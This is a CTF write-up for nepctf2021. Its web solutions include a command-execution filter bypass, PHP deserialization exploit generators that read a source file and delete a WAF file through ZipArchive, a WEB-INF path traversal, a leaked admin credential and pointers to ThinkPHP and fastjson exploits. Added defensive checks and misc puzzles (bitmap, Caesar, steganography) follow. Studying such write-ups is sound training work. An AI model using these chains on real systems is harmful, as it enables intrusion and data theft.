nepctf2021
web
little_trick
A very simple command-execution bypass.
substr(0,-1) counts from the end of the string:
echo`nl%20*`;
梦里花开牡丹亭 (Flowers Bloom in a Dream at the Peony Pavilion)
<?php
highlight_file(__FILE__);
error_reporting(0);
include('shell.php');
class Game {
    public $username;
    public $password;
    public $choice;
    public $register;
    public $file;
    public $filename;
    public $content;

    public function __construct() {
        $this->username = 'user';
        $this->password = 'user';
    }

    // Runs on unserialize(); the hash is md5('admin').
    public function __wakeup() {
        if (md5($this->register) === "21232f297a57a5a743894a0e4a801fc3") {
            $this->choice = new login($this->file, $this->filename, $this->content);
        } else {
            $this->choice = new register();
        }
    }

    public function __destruct() {
        $this->choice->checking($this->username, $this->password);
    }
}

class login {
    public $file;
    public $filename;
    public $content;

    public function __construct($file, $filename, $content) {
        $this->file = $file;
        $this->filename = $filename;
        $this->content = $content;
    }

    // Calls open() on whatever object was deserialized into $file.
    public function checking($username, $password) {
        if ($username === 'admin' && $password === 'admin') {
            $this->file->open($this->filename, $this->content);
            die('login success you can to open shell file!');
        }
    }
}

class register {
    public function checking($username, $password) {
        if ($username === 'admin' && $password === 'admin') {
            die('success register admin');
        } else {
            die('please register admin ');
        }
    }
}

class Open {
    function open($filename, $content) {
        if (!file_get_contents('waf.txt')) {
            shell($content);
        } else {
            echo file_get_contents($filename . ".php");
        }
    }
}

if ($_GET['a'] !== $_GET['b'] && (md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a']) === sha1($_GET['b']))) {
    @unserialize(base64_decode($_POST['unser']));
}
The gadget chain in this code is not hard to find:
Game::__wakeup -> login::checking -> Open::open
First, look at what shell.php contains.
exp1
<?php
// Game whose file is an Open object and whose filename is a php://filter URL,
// so Open::open() echoes shell.php base64-encoded.
class Game {
    public $username;
    public $password;
    public $choice;
    public $register;
    public $file;
    public $filename;
    public $content;

    public function __construct() {
        $this->username = 'admin';
        $this->password = 'admin';
        $this->register = 'admin';
        $this->file = new Open();
        $this->filename = "php://filter/read=convert.base64-encode/resource=shell";
        $this->content = "ls";
    }
}

class login {
    public $file;
    public $filename;
    public $content;
}

class Open {}

$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));
?>
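It contains a command-execution bypass.
To call the shell function, waf.txt must not exist.
Searching shows that a native class with a method of the same name, open, can be used to delete it.
Explanation of native classes: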
ZipArchive::open
This class can overwrite a file and thereby delete it.
exp2
<?php
// file is a native ZipArchive, so login::checking() ends up calling
// ZipArchive::open('waf.txt', ZipArchive::OVERWRITE).
class Game {
    public $username;
    public $password;
    public $choice;
    public $register;
    public $file;
    public $filename;
    public $content;

    public function __construct() {
        $this->username = 'admin';
        $this->password = 'admin';
        $this->register = 'admin';
        $this->file = new ZipArchive();
        $this->filename = "waf.txt";
        $this->content = ZipArchive::OVERWRITE;
    }
}

class login {
    public $file;
    public $filename;
    public $content;
}

class Open {}

$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));
?>
At this point waf.txt has been deleted.
Then bypass the command-execution filter:
n\l /flag
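A defender-side check for the chain above, as an added example that is not part of the original writeup or the challenge code: it walks the PHP serialize() data carried in the base64 `unser` parameter and reports every object class that is not expected, which is how a native class such as ZipArchive standing in for Open shows up. The allow-list, the function names and the sample payload are assumptions constructed for illustration.

```python
import base64

ALLOWED = {"game"}  # assumption: the only class a legitimate client sends

def php_classes(blob: bytes) -> list:
    """Walk a PHP serialize() blob; return every object class name, in order."""
    found, pos = [], 0

    def upto(ch: bytes) -> bytes:
        nonlocal pos
        end = blob.index(ch, pos)
        token, pos = blob[pos:end], end + 1
        return token

    def value() -> None:
        nonlocal pos
        tag = blob[pos:pos + 1]
        pos += 2                           # tag plus ':' (or the ';' of 'N;')
        if tag == b"N":
            return
        if tag in (b"b", b"i", b"d", b"r", b"R"):
            upto(b";")
        elif tag == b"s":
            n = int(upto(b":"))
            pos += n + 3                   # skip "<n bytes>";
        elif tag in (b"a", b"O"):
            if tag == b"O":
                n = int(upto(b":"))
                found.append(blob[pos + 1:pos + 1 + n].decode())
                pos += n + 3               # skip "<name>":
            count = int(upto(b":"))
            pos += 1                       # '{'
            for _ in range(2 * count):     # key/value pairs
                value()
            pos += 1                       # '}'
        else:
            raise ValueError(f"unsupported tag {tag!r} at offset {pos - 2}")

    value()
    return found

def audit_unser(param_b64: str) -> list:
    """Class names in a base64 'unser' value that are not on the allow-list."""
    blob = base64.b64decode(param_b64, validate=True)
    # PHP class names are case-insensitive, so compare in lower case.
    return [c for c in php_classes(blob) if c.lower() not in ALLOWED]

# Constructed payload shaped like exp2: a Game whose file is a ZipArchive.
SAMPLE = base64.b64encode(
    b'O:4:"Game":2:{s:4:"file";O:10:"ZipArchive":0:{}s:7:"content";i:8;}').decode()
```

Because strings are skipped by their declared length, text that merely looks like an object token inside a string value is not reported. On the PHP side the matching fix is to pass an `allowed_classes` list to unserialize() or to stop deserializing request data at all.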
fake_revenge
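After downloading the source it turns out to be the ThinkPHP framework, so just hit it with a payload.
Some functions turn out to be disabled.
passthru turns out to be usable.
cat flag is all that is needed.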
easy_tomcat
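On entering, a login is required.
Tried weak passwords and SQL injection with no result, then scanned the directories.
Register and log in.
Found a head_path parameter; there may be an arbitrary file read.
Use the absolute path together with a bypass: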
static/img/../../WEB-INF/web.xml
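A comment in the page source says to try admin.
Read LoginServelet.class; base64-decoding the response gives this stuff. Take a look at InitServlet, which does the initialization.
The admin password is visible: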
admin/no_one_knows_my_password_75767388428345
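Inside, the account that logged in earlier is listed, and it can be deleted.
The request it sends is JSON, and the AdminServlet file read earlier happens to contain fastjson references.
vn had one of these not long ago: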
https://blog.csdn.net/SopRomeo/article/details/114945759?spm=1001.2014.3001.5501
No bypass is even needed.
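A server-side check that rejects the head_path value used above, as an added example (not the challenge's code): the path is decoded and normalized before it is compared with the one directory it may point into. The allowed directory /static/img and the function names are assumptions.

```python
import posixpath
from urllib.parse import unquote

ALLOWED_DIR = "/static/img"             # assumption: avatars live only here
PRIVATE_DIRS = {"web-inf", "meta-inf"}  # never served directly by a servlet container

def resolve_head_path(value: str) -> str:
    """Return the normalized webapp-relative path, or raise ValueError."""
    decoded = unquote(value)
    if "%" in decoded or "\\" in decoded or "\x00" in decoded:
        raise ValueError("double encoding, backslash or NUL in path")
    # Anchor at the webapp root and collapse every '.' and '..' segment first.
    normalized = posixpath.normpath("/" + decoded.lstrip("/"))
    if any(part.lower() in PRIVATE_DIRS for part in normalized.split("/")):
        raise ValueError("container-private directory")
    if not normalized.startswith(ALLOWED_DIR + "/"):
        raise ValueError("outside " + ALLOWED_DIR)
    return normalized

def is_allowed(value: str) -> bool:
    """True when the value resolves to a file under ALLOWED_DIR."""
    try:
        resolve_head_path(value)
        return True
    except ValueError:
        return False
```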
misc
签到 (Sign-in)
Just loop over the data and print each value in binary.
# -*- coding: utf-8 -*-
# @File : test
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date : 2021/3/20 10:58
flag =[0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffff9ffffffffffff,0xfffffffffffffffffff5f0001fffffff,0xfffffffffffffffe000407ffcfffffff,0xfffffffffffffff8fffffffff7ffffff,0xfffffffffffffff3fffffffff3ffffff,0xffffffffffffffcffffffffffbffffff,0xffffffffffffffdffffffffffbfffff
f,0xffffffffffffffdffffffffffbffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffcffffff,0xfffffffffffffffffffffffffcffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffff0000ffffffffffff,0xfffffffffffffffe7fff1f9fffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffe1fffffffffffdffffffffffff,0xffffff8cfffffffffffdffffffffffff,0xfff03fbf7ffffffffffbffffffffffff,0xffe79f3f3ffffffffffbffffffffffff,0xffefde7fbffffffffffbffffffffffff,0xffefeeff9ffffffffffbffffffffffff,0xffefe6ffdffffffffff9ffffffffffff,0xffcff6ffdffffffffffcffffffffffff,0xffdffaffcffffffffffe3fffffffffff,0xffdff8ffefffffffffff800fffffffff,0xffdff9ffefffffffffff0fffffffffff,0xffdffdffeffffffffffc7fffffffffff,0xffdffffff7fffffffff3ffffffffffff,0xffdffffff7fffffffff7ffffffffffff,0xffdffffff7ffffffffffffffffffffff,0xffdfff9fffffffffffffff7fffffffff,0xffffffbfffffffffffffff3fffffffff,0xffffff7ffffffffffffc1fbfffffffff,0xffffff7ffffffffffff9df9fffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff9ffffffffffffbdf9fffffffff,0xffffffcffffffffffffbdfbfffffffff,0xffffffe3fffffffffffbdfbfffffffff,0xffffffc007fffffffffbdf3fffffffff,0xffffff1f83fffffffff9df7fffffffff,0xfffffe7ffffffffffffcdcffffffffff,0xfffffefffffffffffffe01ffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffff3ffffffffffffffffffffff,0xfffffff3e7ffffffffffffffffffffff,0xffffffc78ffffffffff8ffffffffffff,0xffffffb03fffffffffff3fffffffffff,0xffffff23ffffffffffff87ffffffffff,0xffffff787ffffffffffff0ffffffffff,0xffffff7f9ffffffffffffc7fffffffff,0xf
fffff7fc7fffffffffff1ffffffffff,0xffffff7ff3ffffffffffc7ffffffffff,0xffffffbffbffffffffff1fffffffffff,0xffffffcffbfffffffffcffffffffffff,0xffffffe7e7ffffffffe1ffffffffffff,0xfffffff80fffffffffefffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffe3ffffffffff,0xfffffffffffffffff01f89ffffffffff,0xffffffffffffffffc7cf3cffffffffff,0xffffffffffffffff9fee7effffffffff,0xfffffffffbffffff3ff6feffffffffff,0xfffffffffbffffff7ff2fe7fffffffff,0xfffffffffbffffff7ffaff7fffffffff,0xfffffffffbfffffefff8ff7fffffffff,0xfffffffffbfffffefffcff7fffffffff,0xfffffffffbfffffefffcff3fffffffff,0xfffffffffbfffffefffcffbfffffffff,0xfffffffffbfffffeffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbfffffc00ffffffffffffff,0xfffffffffbfffffbff00001fffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffffffffffffdfcffffffffff,0xfffffffffffffffffffbfeffffffffff,0xfffffffffffffffffff3fe7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffe1ffffffffff7ff7fffffffff,0xfffffff0fffffffffff7ff7fffffffff,0xffffff8ffffffffffff7feffffffffff,0xfffffff3fffffffffff9f0ffffffffff,0xfffffffcfffffffffffe07ffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffc0ffffffffffffffffffffffff,0xffffff
fffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xff8001fffffffffffffffff7ffffffff,0xffbffc00fffffffffffffff7ffffffff,0xff7ffffe1ffffffffffffff7ffffffff,0xff7fffffcffffffffffffff7ffffffff,0xff7fffffe7fffffffffffff7ffffffff,0xff3ffffff3fffffffffffff7ffffffff,0xffbffffffbfffffffffffff7ffffffff,0xff7ffffff3fffffffffffff7ffffffff,0xff83ffffe7fffffffffffff7ffffffff,0xfff83fffcffffffffffffff7ffffffff,0xffff80003ffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffbffffffffffffffffffff7ffffffff,0xff9ffffffffffffffffffff7ffffffff,0xffdffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfffbfffffffffffffffffff7ffffffff,0xfff9fffffffffffffffffff7ffffffff,0xfffdfffffffffffffffffff7ffffffff,0xfffcfffffffffffffffffff7ffffffff,0xfffefffffffffffffffffff7ffffffff,0xfffe7ffffffffffffffffff7ffffffff,0xffff3ffffffffffffffffff7ffffffff,0xffffbfffffffffffffffffffffffffff,0xffffbfffffffffffffffffffffffffff,0xffff9f003fffffffffffffffffffffff,0xffffc07f83ffffffffffffffffffffff,0xffff9fffffffffff8000001fffffffff,0xffff3fffffffffff3fffffcfffffffff,0xfffe7ffffffffffe7fffffe7ffffffff,0xfffcfffffffffffcfffffff3ffffffff,0xfff9fffffffffffc1ffffff3ffffffff,0xfff3fffffffffffe7fffffc7ffffffff,0xffe7ffffffffffff03ffe01fffffffff,0xffdffffffffffffff8000fffffffffff,0xff3fffffffffffffffffffffffffffff,0xfe7fffffffffffffffffffffffffffff,0xf8ffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffefffe03ffffffffff,0xffffffffffffffff7ffcf8ffffffffff,0xfbffffffffffffff7ff9feffffffffff,0xf3ffffffffffffff7ff3ff7fffffffff,0xe7fffffffff
fffffbff7ffbfffffffff,0xefffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffdfffffffff,0xeffffffffcffffffbff7ffdfffffffff,0xeffffffffeffffffbff7ffdfffffffff,0xe7fffc0ffeffffffbff7ffcfffffffff,0xf3fff9e07effffffbff7ffefffffffff,0xf80017ff80ffffffbff7ffefffffffff,0xffffd7ffffffffff0037ffefffffffff,0xffffc7ffffffffffffc3ffefffffffff,0xffffefffffffffffffffffefffffffff,0xffffefffffffffffffffffcfffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffe03fffffffffffffffffffffffff,0xffffcf9fffffffffffffffffffffffff,0xffff9fdffffffffffffffff7ffffffff,0xffffbfdffffffffffffffff7ffffffff,0xffffbfcffffffffffffffff7ffffffff,0xffff3feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff000000007ffffffffff7ffffffff,0xffffbffffffe7ffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffffffdffffffffffffffff7ffffffff,0xffffffcffffffffffffffff7ffffffff,0xffff07effffffffffffffff7ffffffff,0xffff73effffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff9bcffffffffffffffff7ffffffff,0xffffc3dffffffffffffffff7ffffffff,0xfffff01ffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfcfffffffffffffffffffff7ffffffff,0xfe1ffffffffffffffffffff7ffffffff,0xffe0fffffffffffffffffff7ffffffff,0xfffe07fffffffffffffffff7ffffffff,0xfffff00ffffffffffffffff7ffffffff,0xffffffeffffffffffffffff7ffffffff,0xffffff8ffffffffffffffff7ffffffff,0xfffffe3ffffffffffffffff7ffffffff,0xfffff8ffffffffffffffffffffffffff,0xffffe3ffffffffffffffffffffffffff,0xfffe1fffffffffffffffffffffffffff,0xffc0ffffffffffffffffffffffffffff,0xfc1fffffffffffffffffffffffffffff,0xfc7fffffffffffff
ffffffffffffffff,0xff807fffffffffffffffffffffffffff,0xffff01ffffffffffffffffffffffffff,0xfffffc07ffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff]
# Print each value as one 128-bit binary row.
for i in flag:
    print("{:0128b}".format(i))
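Read the characters off the picture.
出题人日记 (Challenge Author's Diary)
After changing the extension to zip, some characters are found.
Caesar cipher.
Search for JS image steganography.
JS steganography
JS steganography tool download
Decrypting this image is all that is needed.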
crypto
Real_Base
As a web player